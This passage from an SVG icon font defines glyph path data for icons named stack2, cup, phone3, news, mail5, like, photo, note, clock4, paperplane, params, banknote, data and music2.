<glyph unicode="&#xe925;" glyph-name="stack2" d="M1021.568 369.44l-128.064 480.192c-7.744 27.296-33.056 46.368-61.504 46.368h-640c-28.48 0-53.76-19.072-61.504-46.368l-128.064-480.192c-1.632-5.824-2.432-11.68-2.432-17.44v-224c0-70.688 57.312-128 128-128h768c70.688 0 128 57.312 128 128v224c0 5.76-0.8 11.616-2.432 17.44zM960 128c0-35.264-28.736-64-64-64h-768c-35.296 0-64 28.736-64 64v224l128.032 480.032h639.904l128.064-480.032v-224zM759.744 768h-495.488c-14.496 0-27.2-9.76-30.944-23.776l-110.24-384c-2.528-9.632-0.512-19.872 5.568-27.744s15.424-12.48 25.344-12.48h146.176l46.304-92.64c10.88-21.664 33.024-35.36 57.28-35.36h216.512c24.256 0 46.368 13.696 57.248 35.36l46.304 92.64h146.176c9.952 0 19.328 4.64 25.376 12.512s8.064 18.112 5.568 27.744l-110.24 384c-3.744 14.016-16.448 23.744-30.944 23.744zM776.992 384h-53.184c-24.384 0-46.304-13.504-57.248-35.36l-46.304-92.64h-216.512l-46.304 92.64c-10.944 21.856-32.864 35.36-57.248 35.36h-129.504l93.568 352h495.488l93.568-352h-76.32z" />
<glyph unicode="&#xe926;" glyph-name="cup" d="M899.552 799.296l-38.88 116.96c-8.672 26.144-33.12 43.744-60.672 43.744h-576c-27.584 0-52-17.6-60.736-43.744l-39.2-117.024c-33.408-2.144-60.064-29.28-60.064-63.232v-96c0-35.328 28.672-64 64-64h33.088c0-2.4-0.96-4.672-0.672-7.072l64-576c3.584-32.352 30.944-56.928 63.584-56.928h448c32.64 0 60 24.576 63.552 56.928l64 576c0.32 2.4-0.672 4.672-0.672 7.072h33.12c35.328 0 64 28.672 64 64v96c0 34.080-26.88 61.344-60.448 63.296zM224 896h576l32-96h-640l32 96zM288 0l-10.656 96h469.312l-10.656-96h-448zM750.176 128h-476.416l-35.552 320h547.552l-35.584-320zM789.312 480h-554.656l-10.656 96h576l-10.688-96zM896 640h-768v96h768v-96z" />
<glyph unicode="&#xe927;" glyph-name="phone3" d="M768 960h-512c-53.056 0-96-42.976-96-96v-832c0-53.056 42.976-96 96-96h512c52.992 0 96 43.008 96 96v832c0 53.056-43.008 96-96 96zM800 32c0-17.632-14.368-32-32-32h-512c-17.664 0-32 14.304-32 32v64.128h576v-64.128zM800 128.128h-576v639.872h576v-639.872zM800 800h-576v64c0 17.664 14.336 32 32 32h512c17.632 0 32-14.336 32-32v-64zM576 848c0-8.832-7.2-16-16-16h-96c-8.864 0-16 7.168-16 16v0c0 8.864 7.136 16 16 16h96c8.8 0 16-7.136 16-16v0zM544 48.128c0-8.8-7.2-16-16-16h-32c-8.832 0-16 7.2-16 16v0c0 8.864 7.168 16 16 16h32c8.8 0 16-7.136 16-16v0z" />
<glyph unicode="&#xe928;" glyph-name="news" d="M928 960h-704c-53.024 0-96-42.944-96-96v-64h-32c-53.024 0-96-42.944-96-96v-640c0-70.688 57.312-128 128-128h768c70.688 0 128 57.312 128 128v800c0 53.056-43.008 96-96 96zM960 64c0-35.264-28.736-64-64-64h-768c-35.296 0-64 28.736-64 64v640c0 17.664 14.336 32 32 32h32v-640c0-17.696 14.304-32 32-32s32 14.304 32 32v768c0 17.664 14.336 32 32 32h704c17.632 0 32-14.336 32-32v-800zM623.936 543.84c-8.8 0-16 7.168-16 16s7.2 16 16 16h256c8.864 0 16-7.168 16-16s-7.136-16-16-16h-256zM623.936 639.84c-8.8 0-16 7.168-16 16s7.2 16 16 16h256c8.864 0 16-7.168 16-16s-7.136-16-16-16h-256zM623.936 735.84c-8.8 0-16 7.168-16 16s7.2 16 16 16h256c8.864 0 16-7.168 16-16s-7.136-16-16-16h-256zM528 95.872c8.832 0 16-7.2 16-16 0-8.864-7.2-16-16-16h-256c-8.832 0-16 7.136-16 16 0 8.8 7.168 16 16 16h256zM528 191.872c8.832 0 16-7.2 16-16 0-8.864-7.2-16-16-16h-256c-8.832 0-16 7.136-16 16 0 8.8 7.168 16 16 16h256zM528 287.872c8.832 0 16-7.2 16-16 0-8.864-7.2-16-16-16h-256c-8.832 0-16 7.136-16 16 0 8.8 7.168 16 16 16h256zM880 95.872c8.8 0 16-7.2 16-16 0-8.864-7.2-16-16-16h-256c-8.864 0-16 7.136-16 16 0 8.8 7.136 16 16 16h256zM880 191.872c8.8 0 16-7.2 16-16 0-8.864-7.2-16-16-16h-256c-8.864 0-16 7.136-16 16 0 8.8 7.136 16 16 16h256zM880 287.872c8.8 0 16-7.2 16-16 0-8.864-7.2-16-16-16h-256c-8.864 0-16 7.136-16 16 0 8.8 7.136 16 16 16h256zM880 479.872c8.8 0 16-7.168 16-16s-7.2-16-16-16h-608c-8.832 0-16 7.168-16 16s7.168 16 16 16h608zM880 383.872c8.8 0 16-7.2 16-16 0-8.864-7.2-16-16-16h-608c-8.832 0-16 7.136-16 16 0 8.8 7.168 16 16 16h608zM288 544h224c17.696 0 32 14.304 32 32v223.872c0 17.696-14.304 32-32 32h-224c-17.696 0-32-14.304-32-32v-223.872c0-17.664 14.304-32 32-32zM320 768h160v-160h-160v160z" />
<glyph unicode="&#xe929;" glyph-name="mail5" d="M896 800h-768c-70.688 0-128-57.344-128-128v-416c0-70.688 57.312-128 128-128h768c70.688 0 128 57.312 128 128v416c0 70.656-57.312 128-128 128zM64 632l223.968-168-223.968-168v336zM960 256c0-35.328-28.736-64-64-64h-768c-35.296 0-64 28.672-64 64l250.624 188 139.776-104.864c17.056-12.736 37.312-19.2 57.6-19.2 20.256 0 40.512 6.432 57.568 19.2l139.808 104.864 250.624-188zM960 296l-224 168 224 168v-336zM550.368 364.736c-11.168-8.384-24.416-12.8-38.368-12.8s-27.232 4.448-38.4 12.8l-409.6 307.264c0 35.296 28.704 64 64 64h768c35.264 0 64-28.704 64-64l-409.632-307.264z" />
<glyph unicode="&#xe92a;" glyph-name="like" d="M933.248 624.896c-40 10.496-134.048 10.368-271.616 14.016 6.496 30.016 8 57.088 8 105.152 0 114.816-83.648 215.936-157.632 215.936-52.256 0-95.328-42.72-96-95.264-0.704-64.448-20.64-175.744-128-232.192-7.872-4.16-30.4-15.264-33.696-16.704l1.696-1.44c-16.8 14.496-40.096 25.6-64 25.6h-96c-52.928 0-96-43.072-96-96v-512c0-52.928 43.072-96 96-96h96c38.080 0 69.952 23.008 85.376 55.264 0.384-0.128 1.056-0.32 1.504-0.384 2.112-0.576 4.608-1.184 7.648-1.984 0.576-0.16 0.864-0.224 1.472-0.384 18.432-4.576 53.92-13.056 129.76-30.496 16.256-3.712 102.144-22.016 191.104-22.016h174.944c53.312 0 91.744 20.512 114.624 61.696 0.32 0.64 7.68 15.008 13.696 34.432 4.512 14.624 6.176 35.328 0.736 56.32 34.368 23.616 45.44 59.328 52.64 82.56 12.064 38.112 8.448 66.752 0.064 87.264 19.328 18.24 35.808 46.048 42.752 88.512 4.32 26.304-0.32 53.376-12.448 75.904 18.112 20.352 26.368 45.952 27.328 69.632l0.384 6.688c0.224 4.192 0.416 6.784 0.416 16 0 40.416-28 91.968-90.752 109.888zM224 32c0-17.696-14.304-32-32-32h-96c-17.696 0-32 14.304-32 32v512c0 17.696 14.304 32 32 32h96c17.696 0 32-14.304 32-32v-512zM959.264 494.88c-0.64-15.808-7.264-46.88-63.264-46.88-48 0-64 0-64 0-8.864 0-16-7.168-16-16s7.136-16 16-16c0 0 14.016 0 62.016 0s54.304-39.808 51.2-59.008c-3.968-23.872-15.168-68.992-69.216-68.992-53.984 0-76 0-76 0-8.864 0-16-7.136-16-16 0-8.8 7.136-16 16-16 0 0 38.016 0 63.008 0 54.016 0 49.248-41.184 41.504-65.76-10.208-32.288-16.448-62.24-84.512-62.24-23.008 0-52.192 0-52.192 0-8.864 0-16-7.136-16-16 0-8.8 7.136-16 16-16 0 0 22.176 0 50.176 0 35.008 0 36.64-33.12 32.992-44.992-4-12.992-8.736-22.624-8.928-23.072-9.664-17.44-25.248-27.936-58.24-27.936h-174.944c-87.872 0-175.040 19.936-177.28 20.448-132.928 30.624-139.936 32.992-148.288 35.36 0 0-27.072 4.576-27.072 28.192l-0.224 441.984c0 15.008 9.568 28.576 25.408 33.344 1.984 0.768 4.672 1.6 6.592 2.4 146.176 60.544 190.688 193.28 192 302.272 0.192 15.328 12 32 32 32 33.824 0 93.632-67.904 93.632-151.936 0-75.872-3.072-88.992-29.632-168.064 320 0 317.76-4.608 345.984-12 35.008-10.016 38.016-39.008 38.016-48.992 0-10.976-0.32-9.376-0.736-20.128zM144 128c-26.496 0-48-21.504-48-48s21.504-48 48-48 48 21.504 48 48-21.504 48-48 48zM144 64c-8.8 0-16 7.2-16 16s7.2 16 16 16 16-7.2 16-16-7.2-16-16-16z" />
<glyph unicode="&#xe92b;" glyph-name="photo" d="M864 960h-704c-70.688 0-128-57.312-128-128v-768c0-70.688 57.312-128 128-128h704c70.688 0 128 57.312 128 128v768c0 70.688-57.312 128-128 128zM928 64c0-35.264-28.736-64-64-64h-704c-35.296 0-64 28.736-64 64v768c0 35.296 28.704 64 64 64h704c35.264 0 64-28.704 64-64v-768zM832 832h-640c-17.696 0-32-14.304-32-32v-576c0-17.696 14.304-32 32-32h640c17.696 0 32 14.304 32 32v576c0 17.696-14.304 32-32 32zM832 800v-443.808l-104 112.96c-6.112 6.912-14.816 10.848-24 10.848s-17.952-3.936-24-10.848l-83.328-94.4-252.672 286.4c-6.080 6.912-14.816 10.848-24 10.848s-17.92-3.936-24-10.848l-104-119.936v258.784h640zM192 492.8l128 147.2 276.672-313.632 88.384-102.368h-493.056v268.8zM727.68 224l-109.696 126.56 86.016 97.44 128-140.128v-83.872h-104.32zM640 544c52.992 0 96 42.976 96 96s-43.008 96-96 96c-53.056 0-96-42.976-96-96s42.944-96 96-96zM640 704c35.264 0 64-28.704 64-64s-28.736-64-64-64c-35.328 0-64 28.704-64 64s28.672 64 64 64z" />
<glyph unicode="&#xe92c;" glyph-name="note" d="M1005.248 717.28l-192 192c-12 12-28.32 18.72-45.248 18.72h-672c-52.928 0-96-43.040-96-96v-768c0-52.928 43.072-96 96-96h832c52.928 0 96 43.072 96 96v608c0 16.992-6.752 33.28-18.752 45.28zM960 64c0-17.696-14.304-32-32-32h-832c-17.696 0-32 14.304-32 32v768c0 17.696 14.304 32 32 32h640v-128h-0.064c0-53.024 43.008-96 96-96h128.064v-576zM863.936 672h-32c-35.264 0-64 28.704-64 64h0.064v128l192-192h-96.064zM496 704c-8.832 0-16 7.136-16 16s7.168 16 16 16h160c8.8 0 16-7.168 16-16s-7.2-16-16-16h-160zM496 608c-8.832 0-16 7.168-16 16s7.168 16 16 16h160c8.8 0 16-7.168 16-16s-7.2-16-16-16h-160zM480 528c0 8.864 7.168 16 16 16h384c8.8 0 16-7.168 16-16s-7.2-16-16-16h-384c-8.832 0-16 7.168-16 16zM880 352c8.8 0 16-7.136 16-16 0-8.8-7.2-16-16-16h-736c-8.832 0-16 7.2-16 16 0 8.864 7.168 16 16 16h736zM880 256c8.8 0 16-7.136 16-16 0-8.8-7.2-16-16-16h-736c-8.832 0-16 7.2-16 16 0 8.864 7.168 16 16 16h736zM880 160c8.8 0 16-7.136 16-16 0-8.8-7.2-16-16-16h-736c-8.832 0-16 7.2-16 16 0 8.864 7.168 16 16 16h736zM880 448c8.8 0 16-7.168 16-16s-7.2-16-16-16h-736c-8.832 0-16 7.136-16 16s7.168 16 16 16h736zM160 512h224c17.696 0 32 14.304 32 32v192c0 17.696-14.304 32-32 32h-224c-17.696 0-32-14.304-32-32v-192c0-17.664 14.304-32 32-32zM192 704h160v-128h-160v128z" />
<glyph unicode="&#xe92d;" glyph-name="clock4" d="M480 640c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32s-32 14.327-32 32zM480 256c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32s-32 14.327-32 32zM288 448c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32s-32 14.327-32 32zM672 448c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32s-32 14.327-32 32zM344.224 312.256c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32s-32 14.327-32 32zM344.224 583.776c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32s-32 14.327-32 32zM615.744 312.256c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32s-32 14.327-32 32zM832 512c-2.24 0-4.128-1.056-6.304-1.28-11.136 55.84-37.44 105.792-73.504 147.008l-45.952 249.984c-5.6 30.304-32.064 52.288-62.912 52.288h-256c-30.848 0-57.28-22.016-62.944-52.32l-44.8-241.568c-53.76-57.184-87.584-133.376-87.584-218.112 0-82.656 32.448-156.96 83.872-213.696l45.184-246.016c5.632-30.272 32.096-52.288 62.944-52.288h256c30.816 0 57.248 22.016 62.944 52.32l45.568 245.824c38.048 41.952 65.696 93.44 77.184 151.2 2.176-0.288 4.064-1.344 6.304-1.344 35.328 0 64 28.672 64 64 0 35.36-28.672 64-64 64zM387.328 896h256l32-172.384c-47.264 27.488-101.376 44.384-160 44.384-58.592 0-112.736-16.896-160-44.384l32 172.384zM640 0h-256l-32 172.384c47.232-27.456 101.376-44.384 160-44.384 58.592 0 112.768 16.928 160 44.384l-32-172.384zM512 192c-141.152 0-256 114.88-256 256 0 141.152 114.848 256 256 256s256-114.848 256-256c0-141.12-114.88-256-256-256zM670.112 607.168c3.872-3.872 4.256-10.112 0.896-14.368l-77.632-96.672-59.136-71.2c-6.048-5.824-14.368-8.8-22.368-8.864-8.608 0.064-16.64 3.392-22.624 9.344s-9.248 13.92-9.248 22.336c0 8.704 3.36 16.832 9.472 22.976l166.144 137.12c4.384 3.52 10.624 3.2 14.496-0.672z" />
<glyph unicode="&#xe92e;" glyph-name="paperplane" d="M1009.376 954.88c-5.312 3.424-11.36 5.12-17.376 5.12-6.176 0-12.384-1.76-17.76-5.376l-960-640c-9.888-6.56-15.328-18.112-14.048-29.952 1.216-11.808 8.896-22.016 19.936-26.368l250.368-100.192 117.728-206.016c5.632-9.888 16.096-16 27.424-16.128 0.128 0 0.224 0 0.352 0 11.232 0 21.664 5.952 27.424 15.552l66.464 110.816 310.24-124.064c3.808-1.536 7.808-2.272 11.872-2.272 5.44 0 10.816 1.376 15.68 4.128 8.448 4.736 14.24 13.056 15.872 22.624l160 960c2.080 12.576-3.488 25.184-14.176 32.128zM100.352 295.136l741.6 494.432-539.2-577.184c-2.848 1.696-5.376 3.936-8.512 5.184l-193.888 77.568zM326.048 189.888c-0.064 0.128-0.16 0.192-0.224 0.32l606.176 648.8-516.768-805.184-89.184 156.064zM806.944 12.512l-273.312 109.312c-6.496 2.56-13.248 3.424-19.936 3.808l420.864 652.416-127.616-765.536z" />
<glyph unicode="&#xe92f;" glyph-name="params" d="M256 767.328v96.672c0 52.928-43.072 96-96 96s-96-43.072-96-96v-96.672c-38.656-29.28-64-75.136-64-127.328s25.344-98.048 64-127.264v-480.736c0-52.928 43.072-96 96-96s96 43.072 96 96v480.736c38.656 29.184 64 75.072 64 127.264s-25.344 98.048-64 127.328zM128 864c0 17.696 14.304 32 32 32s32-14.304 32-32v-67.2c-10.336 2.080-21.024 3.2-32 3.2s-21.664-1.12-32-3.2v67.2zM192 32c0-17.696-14.304-32-32-32s-32 14.304-32 32v451.264c10.336-2.144 21.024-3.264 32-3.264s21.664 1.12 32 3.264v-451.264zM251.68 613.12c-0.512-1.696-0.96-3.36-1.568-5.056-3.040-8.448-6.944-16.448-12.096-23.552-0.128-0.192-0.32-0.32-0.448-0.512-5.568-7.616-12.192-14.368-19.712-20.064-0.128-0.128-0.224-0.192-0.32-0.256-7.712-5.824-16.32-10.496-25.568-13.76-10.016-3.616-20.672-5.92-31.968-5.92s-21.952 2.304-32 5.952c-9.248 3.264-17.856 7.936-25.568 13.76-0.096 0.064-0.192 0.128-0.32 0.256-7.52 5.696-14.144 12.448-19.712 20.064-0.128 0.192-0.32 0.32-0.448 0.512-5.152 7.136-9.056 15.136-12.096 23.552-0.608 1.696-1.056 3.36-1.568 5.056-2.528 8.544-4.288 17.472-4.288 26.848 0 9.44 1.76 18.368 4.32 26.944 0.512 1.696 0.96 3.36 1.568 4.992 3.008 8.448 6.912 16.448 12.096 23.616 0.128 0.192 0.32 0.32 0.448 0.512 5.568 7.552 12.192 14.368 19.712 20.064 0.128 0.064 0.224 0.192 0.32 0.256 7.68 5.728 16.288 10.432 25.536 13.728 10.048 3.584 20.704 5.888 32 5.888s21.952-2.304 32-5.888c9.248-3.328 17.856-8 25.568-13.76 0.096-0.064 0.192-0.192 0.32-0.256 7.52-5.696 14.144-12.512 19.712-20.064 0.128-0.192 0.32-0.32 0.448-0.512 5.152-7.136 9.056-15.136 12.064-23.584 0.608-1.632 1.088-3.296 1.568-4.992 2.56-8.576 4.32-17.504 4.32-26.944 0-9.376-1.76-18.304-4.32-26.88zM960 767.328v96.672c0 52.928-43.072 96-96 96s-96-43.072-96-96v-96.672c-38.688-29.28-64-75.136-64-127.328s25.312-98.048 64-127.264v-480.736c0-52.928 43.072-96 96-96s96 43.072 96 96v480.736c38.624 29.184 64 75.072 64 127.264s-25.376 98.048-64 127.328zM832 864c0 17.696 14.304 32 32 32s32-14.304 32-32v-67.2c-10.368 2.080-21.056 3.2-32 3.2-11.008 0-21.696-1.12-32-3.2v67.2zM896 32c0-17.696-14.304-32-32-32s-32 14.304-32 32v451.264c10.304-2.144 20.992-3.264 32-3.264 10.944 0 21.632 1.12 32 3.264v-451.264zM955.68 613.12c-0.512-1.696-0.992-3.36-1.568-5.056-3.072-8.448-6.944-16.448-12.128-23.552-0.128-0.192-0.32-0.32-0.448-0.512-5.568-7.616-12.192-14.368-19.68-20.064-0.128-0.128-0.256-0.192-0.32-0.256-7.744-5.824-16.32-10.496-25.568-13.76-10.016-3.616-20.704-5.92-31.968-5.92-11.328 0-21.952 2.304-32 5.952-9.248 3.264-17.888 7.936-25.568 13.76-0.128 0.064-0.192 0.128-0.32 0.256-7.552 5.696-14.176 12.448-19.744 20.064-0.128 0.192-0.32 0.32-0.448 0.512-5.12 7.136-9.056 15.136-12.064 23.552-0.64 1.696-1.056 3.36-1.568 5.056-2.528 8.544-4.288 17.472-4.288 26.848 0 9.44 1.76 18.368 4.32 26.944 0.512 1.696 0.928 3.36 1.568 4.992 3.008 8.448 6.944 16.448 12.064 23.616 0.128 0.192 0.32 0.32 0.448 0.512 5.568 7.552 12.192 14.368 19.744 20.064 0.128 0.064 0.192 0.192 0.32 0.256 7.68 5.76 16.32 10.432 25.568 13.76 10.016 3.552 20.64 5.856 31.968 5.856 11.264 0 21.952-2.304 32-5.888 9.248-3.328 17.824-8 25.568-13.76 0.064-0.064 0.192-0.192 0.32-0.256 7.488-5.696 14.112-12.512 19.68-20.064 0.128-0.192 0.32-0.32 0.448-0.512 5.184-7.2 9.056-15.2 12.128-23.616 0.576-1.632 1.056-3.328 1.568-4.992 2.528-8.544 4.288-17.472 4.288-26.912 0-9.376-1.76-18.304-4.32-26.88zM608 383.328v480.672c0 52.928-43.072 96-96 96s-96-43.072-96-96v-480.672c-38.656-29.248-64-75.136-64-127.328s25.344-98.048 64-127.264v-96.736c0-52.928 43.072-96 96-96s96 43.072 96 96v96.736c38.624 29.184 64 75.072 64 127.264s-25.376 98.048-64 127.328zM480 864c0 17.696 14.304 32 32 32s32-14.304 32-32v-451.2c-10.368 2.048-21.056 3.2-32 3.2-10.976 0-21.664-1.12-32-3.2v451.2zM544 32c0-17.696-14.304-32-32-32s-32 14.304-32 32v67.264c10.336-2.144 21.024-3.264 32-3.264 10.944 0 21.632 1.12 32 3.264v-67.264zM603.68 229.12c-0.512-1.696-0.992-3.36-1.568-5.056-3.072-8.448-6.944-16.448-12.128-23.552-0.128-0.192-0.32-0.32-0.448-0.512-5.568-7.616-12.192-14.368-19.68-20.064-0.128-0.128-0.256-0.192-0.32-0.256-7.744-5.824-16.32-10.496-25.568-13.76-10.016-3.616-20.704-5.92-31.968-5.92-11.296 0-21.952 2.304-32 5.952-9.248 3.264-17.856 7.936-25.568 13.76-0.096 0.064-0.192 0.128-0.32 0.256-7.52 5.696-14.144 12.448-19.712 20.064-0.128 0.192-0.32 0.32-0.448 0.512-5.152 7.136-9.056 15.136-12.096 23.552-0.608 1.696-1.056 3.36-1.568 5.056-2.528 8.544-4.288 17.472-4.288 26.848 0 9.44 1.76 18.368 4.32 26.944 0.512 1.696 0.96 3.36 1.568 4.992 3.040 8.448 6.944 16.448 12.096 23.616 0.128 0.192 0.32 0.32 0.448 0.512 5.568 7.552 12.192 14.368 19.712 20.064 0.128 0.064 0.224 0.192 0.32 0.256 7.712 5.76 16.32 10.432 25.568 13.76 10.016 3.552 20.672 5.856 31.968 5.856 11.264 0 21.952-2.304 32-5.888 9.248-3.328 17.824-8 25.568-13.76 0.064-0.064 0.192-0.192 0.32-0.256 7.488-5.696 14.112-12.512 19.68-20.064 0.128-0.192 0.32-0.32 0.448-0.512 5.184-7.2 9.056-15.2 12.128-23.616 0.576-1.632 1.056-3.328 1.568-4.992 2.528-8.544 4.288-17.472 4.288-26.912 0-9.376-1.76-18.304-4.32-26.88z" />
<glyph unicode="&#xe930;" glyph-name="banknote" d="M1005.28 621.248l-320 320c-15.872 15.872-38.88 22.24-60.672 16.864-11.488-2.816-21.76-8.736-29.888-16.864-7.264-7.264-12.736-16.256-15.872-26.304-14.496-47.008-39.552-87.872-76.64-124.928-49.536-49.504-114.048-87.008-182.304-126.656-72.448-41.984-147.296-85.504-208.64-146.816-52.128-52.192-87.616-110.24-108.416-177.632-7.008-22.752-0.896-47.36 15.872-64.192l320-320c15.872-15.872 38.88-22.24 60.672-16.864 11.488 2.88 21.76 8.736 29.888 16.864 7.264 7.264 12.736 16.256 15.872 26.368 14.528 47.008 39.584 87.872 76.704 124.928 49.504 49.504 113.984 86.944 182.304 126.56 72.384 42.048 147.264 85.568 208.576 146.88 52.128 52.128 87.616 110.24 108.448 177.632 6.976 22.72 0.832 47.424-15.904 64.16zM384 0c-105.984 105.984-214.016 214.048-320 320 90.944 294.432 485.12 281.568 576 576 105.984-105.952 214.048-214.016 320.064-320-90.976-294.368-485.152-281.568-576.064-576zM625.984 483.2c-10.432 8.736-20.928 14.688-31.488 17.632-10.496 2.944-20.992 4.128-31.616 3.36-10.496-0.8-21.248-3.2-32-7.328-10.752-4.192-21.568-8.736-32.448-14.016-17.184 19.744-34.368 39.264-51.552 57.376 7.744 7.008 15.264 10.56 22.496 10.816 7.264 0.32 14.24-0.448 20.864-2.112 6.752-1.696 12.928-3.136 18.624-4.256 5.76-1.12 10.752 0.128 15.136 3.808 4.64 4 7.2 9.184 7.552 15.424 0.32 6.304-2.048 12.448-7.328 18.432-6.752 7.744-14.88 12.448-24.64 14.176-9.632 1.696-19.488 1.568-29.76-0.672-10.112-2.304-19.744-6.112-28.864-11.488s-16.448-10.88-21.888-16.256c-2.080 1.984-4.16 3.936-6.24 5.888-2.304 2.112-5.184 3.264-8.64 3.2-3.488 0-6.368-1.504-8.736-4.256-2.304-2.688-3.36-5.824-2.944-9.12 0.32-3.424 1.696-6.048 4.064-8.064 2.080-1.76 4.16-3.488 6.24-5.312-8.192-9.888-14.944-20.8-20.256-32.32-5.376-11.552-8.576-23.008-9.76-34.112-1.248-11.2-0.064-21.44 3.36-30.944 3.424-9.568 9.76-17.696 19.008-25.376 15.072-12.512 32.8-17.824 53.376-16.64 20.512 1.248 42.624 7.36 66.4 20.128 18.88-21.824 37.824-43.488 56.736-63.616-8-6.752-15.008-10.624-21.184-11.872-6.176-1.312-11.68-1.184-16.672 0.32-4.992 1.568-9.632 3.808-13.888 6.688-4.256 2.944-8.448 5.44-12.64 7.488-4.128 2.048-8.384 3.2-12.736 3.264s-8.992-2.048-14.112-6.432c-5.248-4.576-7.872-9.888-7.872-15.872 0-5.952 2.752-12 8.128-18.112 5.44-6.112 12.512-11.264 21.056-15.328s18.208-6.624 28.832-7.328c10.624-0.736 21.824 0.864 33.632 5.248 11.872 4.32 23.616 12.128 35.2 23.744 5.568-5.44 11.2-10.624 16.8-15.616 2.368-2.048 5.248-3.072 8.736-2.816 3.36 0.128 6.304 1.696 8.64 4.512 2.368 2.88 3.36 6.048 3.008 9.376-0.32 3.36-1.696 5.952-4 7.808-5.632 4.512-11.264 9.248-16.864 14.24 9.568 11.744 17.248 24.128 22.944 36.384 5.696 12.32 9.056 24.192 10.176 35.2 1.12 11.072-0.192 21.056-3.808 30.112-3.584 9.184-9.952 17.056-19.072 24.64zM447.072 461.504c-9.056-0.384-16.96 2.624-23.872 9.312-2.944 2.816-4.992 6.24-6.24 10.304-1.312 4.064-1.76 8.512-1.248 13.376 0.448 4.8 1.888 9.824 4.384 14.88 2.368 5.056 5.888 10.112 10.368 15.008 16.224-16.128 32.416-33.824 48.64-52.128-12.288-6.752-22.976-10.368-32.032-10.752zM598.016 397.44c-2.88-5.312-6.176-10.048-10.048-14.176-17.952 18.112-35.872 38.016-53.76 58.432 4.576 2.048 9.376 4.192 14.56 6.368s10.368 3.616 15.552 4.512c5.312 0.8 10.56 0.576 15.808-0.672 5.184-1.312 10.112-4.128 14.688-8.576 4.512-4.512 7.36-9.184 8.512-14.24 1.248-5.12 1.312-10.304 0.448-15.616-0.928-5.344-2.816-10.656-5.76-16.032zM470.944 250.24c6.304 5.088 15.584 4.832 21.376-1.056 6.272-6.24 6.272-16.448 0-22.688-0.512-0.512-1.056-0.864-1.632-1.312l0.064-0.064c-20.256-15.392-36.896-29.248-54.848-47.2-16.224-16.192-30.88-33.248-43.552-50.56l-20.448-28c-0.64-1.152-1.408-2.208-2.368-3.2-6.272-6.24-16.48-6.24-22.72 0-5.44 5.44-6.112 13.824-2.112 20.064l-0.064 0.064 21.888 29.888c13.664 18.688 29.376 36.992 46.752 54.368 18.080 18.144 37.6 34.336 57.6 49.696h0.064zM588.096 713.12c16.192 16.192 30.816 33.184 43.52 50.592l21.248 29.12c0.768 1.376 1.632 2.752 2.816 3.936 6.304 6.304 16.512 6.304 22.816 0 5.984-6.016 6.24-15.52 0.8-21.888l0.064-0.064-21.888-30.016c-13.696-18.688-29.376-36.928-46.752-54.304-18.080-18.080-37.568-34.336-57.568-49.696l-0.128 0.064c-6.368-5.856-16.256-5.728-22.368 0.448-6.304 6.304-6.304 16.576 0 22.88 1.12 1.184 2.432 2.016 3.744 2.752 18.816 14.368 36.96 29.44 53.696 46.176z" />
<glyph unicode="&#xe931;" glyph-name="data" d="M512 960c-215.808 0-448-65.056-448-208v-608c0-142.88 232.192-208 448-208 215.776 0 448 65.12 448 208v608c0 142.944-232.256 208-448 208zM896 144c0-79.488-171.936-144-384-144-212.096 0-384 64.512-384 144v119.552c66.112-68.128 225.6-103.552 384-103.552s317.888 35.424 384 103.552v-119.552zM896 336h-0.128c0-0.32 0.128-0.672 0.128-0.992 0-79.008-171.936-143.008-384-143.008s-384 64-384 143.008c0 0.32 0.128 0.672 0.128 0.992h-0.128v119.552c66.112-68.128 225.6-103.552 384-103.552s317.888 35.424 384 103.552v-119.552zM896 528h-0.128c0-0.32 0.128-0.672 0.128-0.992 0-79.008-171.936-143.008-384-143.008s-384 64-384 143.008c0 0.32 0.128 0.672 0.128 0.992h-0.128v109.952c83.872-63.904 237.6-93.952 384-93.952s300.128 30.048 384 93.952v-109.952zM512 608c-212.096 0-384 64.512-384 144 0 79.552 171.904 144 384 144 212.064 0 384-64.448 384-144 0-79.488-171.936-144-384-144zM768 128c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32s-32 14.327-32 32zM768 320c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32s-32 14.327-32 32zM768 512c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32s-32 14.327-32 32z" />
<glyph unicode="&#xe932;" glyph-name="music2" d="M1001.152 944.992c-11.616 9.76-26.176 15.008-41.12 15.008-3.68 0-7.424-0.32-11.136-0.992l-544.064-96c-30.592-5.376-52.864-31.936-52.864-63.008v-549.44c-32.48 23.552-74.624 37.44-121.408 37.44-27.2 0-54.4-4.512-80.928-13.312-60.736-20.256-109.44-60.864-133.632-111.488-18.688-39.136-21.088-81.696-6.848-119.872 24.352-65.216 93.536-107.328 176.256-107.328 27.2 0 54.4 4.448 80.896 13.312 60.704 20.192 109.408 60.8 133.6 111.36 10.4 21.824 15.264 44.672 15.456 67.328h0.576v512c3.68 0 7.424 0.32 11.136 0.928l532.96 94.048v-388.416c-32.512 23.552-74.624 37.44-121.44 37.44-27.2 0-54.432-4.512-80.928-13.312-60.736-20.256-109.44-60.864-133.568-111.488-18.688-39.136-21.12-81.696-6.88-119.872 24.384-65.216 93.504-107.328 176.256-107.328 27.2 0 54.432 4.448 80.928 13.312 60.672 20.192 109.376 60.8 133.568 111.36 10.432 21.824 15.264 44.672 15.488 67.328h0.576v672c0 18.88-8.384 36.864-22.88 48.992zM246.016 9.984c-76.672-25.568-155.936-0.576-176.928 55.68-21.056 56.32 24.032 122.688 100.672 148.256 76.672 25.568 155.936 0.64 176.928-55.68 21.088-56.288-24-122.688-100.672-148.256zM852.896 105.984c-76.736-25.568-156-0.576-176.992 55.68-21.056 56.32 24.064 122.688 100.672 148.256 76.736 25.568 156 0.64 176.992-55.68 21.088-56.288-23.968-122.688-100.672-148.256zM958.72 800l-544.064-96v96l544.064 96v-96z" />
